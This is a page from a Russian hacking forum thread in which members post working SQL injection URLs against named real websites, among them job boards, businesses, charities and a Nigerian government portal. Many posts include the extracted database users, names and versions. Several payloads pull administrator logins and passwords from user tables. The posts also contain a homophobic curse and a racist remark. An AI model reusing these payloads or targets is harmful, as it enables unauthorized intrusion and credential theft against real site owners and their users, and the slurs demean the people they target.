ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11341  
Старый 22.12.2009, 13:45
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Код:
http://jobs.webdesignerwall.com/job.php?id=-448+union+all+select+1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11--
designer_admin2@localhost
designer_jobs
4.1.22-standard

Код:
http://jobs.neurope.eu/job.php?id=-1758+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
neweuro_kostas@localhost
neweuro_corporate
4.1.22-standard

Код:
http://www.adclubct.org/job-bank/job.php?id=-19+union+select+1,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,5,6,7--
tdwestne_adclub@localhost
tdwestne_adclubct
5.0.85-community-log


Код:
http://www.gexecutives.com/job.php?ID=-201+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
sfaddoul@localhost
sfaddoul_gexec
5.0.85-community
 
Ответить с цитированием

  #11342  
Старый 23.12.2009, 16:25
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.nlpplanning.com/vacancy.php?id=-55+UNION+SELECT+1,22,3,4,5,6,7,8,9,10,11,12,13

Database Version: 4.0.30-log
Database name: u10001284
User name: u10001284@lon1-webmysql-1.msh.demon.net
 
Ответить с цитированием

  #11343  
Старый 23.12.2009, 21:40
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.mexicoalive.com/news.php?idn=40'
Версия - 5
БД - mexaldbsource
Юзер - mexaldbsource@ip-208-109-254-141.ip.secureserver.net

админка по обычному адресу какая то лажа, а вот в другом месте норм)
 
Ответить с цитированием

  #11344  
Старый 24.12.2009, 13:52
Аватар для -=Razor=-
-=Razor=-
Новичок
Регистрация: 20.12.2008
Сообщений: 24
Провел на форуме:
1187799

Репутация: 62
По умолчанию

Цитата:
http://auto-shina.by/shop/index.php?cat=41&id=-29+union+select+1,concat_ws(0x3,login,0x3,password ,id),3,4,5,6,7,8,9,10,11,12,13,14,151,6,17,18,19,2 0+from+users+limit+1,1--
version: 5.0.86-percona-highperf-b19

Последний раз редактировалось jokester; 24.12.2009 в 14:53.. Причина: павила темы почитай
 
Ответить с цитированием

  #11345  
Старый 26.12.2009, 01:14
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.aztecadventure.co.uk/content.php?cid=22+UNION+SELECT+1,2,3,2,5,6,7,8,9, 10/*

Database Version: 4.1.20
Database name: aztec
User name: aztec_user@localhost

там и без иньекции ошибка
 
Ответить с цитированием

  #11346  
Старый 26.12.2009, 03:51
Аватар для Ayowa
Ayowa
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178

Репутация: 30
По умолчанию

www.chrisjordan.com
Код:
http://www.chrisjordan.com/current_set2.php?id=-11'+union+select+1,concat_ws(CHAR(60,98,114,47,62),version(),database(),user()),3,4,5/*
ver: 4.1.22-max-log
db: cjordanwebdata
user: cjordanwebdata@97.74.24.67

www.reefcheck.org
либо у меня руки не из того места растут, либо там действитеьно нет аксесса к юзерам.
Но на всякий выложу.
Код:
http://www.reefcheck.org/news/news_detail.php?id=252+and+1=2+union+select+concat_ws%280x3a,%20table_name,%20table_schema,column_name%29,2,3+from+information_schema.columns+where+table_name=CHAR%2897,99,99,111,117,110,116%29/*
neoboy.ru
Код:
http://neoboy.ru/goods.php?id=948+and+1=2+union+select+1,2,group_concat%28password%29,4,5,group_concat%28login%29,7,8+from+neoboy_admin--
Чтоб эти геи в аду сгорели ....
 
Ответить с цитированием

  #11347  
Старый 26.12.2009, 15:36
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Новогодний привет bluesoleil'у =)

http://www.bluesoleil.com/products/Default.aspx?TID=-7'+union+select+1/*

version: 5.1.34-community
user: bluesoleil@localhost
database: bluesoleil
os: Win32

ТИЦ: 90
PR: 4

Последний раз редактировалось aka_zver; 26.12.2009 в 19:34..
 
Ответить с цитированием

  #11348  
Старый 26.12.2009, 16:03
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Код:
http://www.insanely-great.com/news.php?id=-1514+union+select+concat_ws(0x3a,user(),database(),version())
flamini_flaminio@216.14.208.109:flamini_igm:4.1.21-log
Код:
http://www.ziggymarley.com/news.php?status=sort&id=6'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)+--+
5.0.67-log
Код:
http://www.digitalsynapsis.tv/news.php?id=-32+union+select+1,2,concat_ws(0x3a,username,password,email),4+from+utenti
 
Ответить с цитированием

  #11349  
Старый 26.12.2009, 23:45
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Думал, что в Нигерии только деревянные хижины и дикари-негры полуголые .. хех

http://www.lagosstate.gov.ng/showeventlist.php?index.php?page=event&evday=14&ev mon=12&evyear=2009+union+select+1,group_concat(tab le_name),3,4,5,6,7,8+from+information_schema.colum ns+where+column_name+like+0x257061737325--+
 
Ответить с цитированием

  #11350  
Старый 27.12.2009, 04:54
Аватар для Ayowa
Ayowa
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178

Репутация: 30
По умолчанию

www.nirvanaaudiovisual.co.uk - MySQL 5
Код:
http://www.nirvanaaudiovisual.co.uk/product_desc.php?id=383+and+1=2+union+select+1,2,3,4,group_concat%28concat_ws%280x3a,admin_firstname,admin_password%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin--
www.powertel.co.id - MySQL 5
Код:
http://www.powertel.co.id/news.php?idm=11&idy=2008+and+1=2+union+select+1,2,3,concat_ws%280x3a,username,password%29,5,6,7+from+login--
www.sierracorporation.com - MySQL 5
Код:
http://www.sierracorporation.com/news.php?id=99%27+and+1=2+union+select+1,2,3,4,group_concat%28concat_ws%280x3a,username,password%29%29,6,7,8,9,10,11,12,131,14+from+users+--+
www.cpehn.org - MySQL 5
Код:
http://www.cpehn.org/register.php?id=111+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,loginname,password%29%29,3,4+from+users--
www.humanedgetech.com - MySQL 5
Код:
http://www.humanedgetech.com/news.php?id=15649+and+1=2+union+select+1,group_concat%28table_name%29,3,4,5,6,7+from+information_schema.tables+where+table_name+like+CHAR%2837,117,115,101,114,37%29--
www.u2wanderer.org - MySQL 4
Код:
http://www.u2wanderer.org/disco/lyrics.php?id=424+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws%28CHAR%2860,98,114,47,62%29,version%28%29,database%28%29,user%28%29%29,9--
www.insanely-great.com - MySQL 4
Код:
http://www.insanely-great.com/news.php?id=6553+and+1=2+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ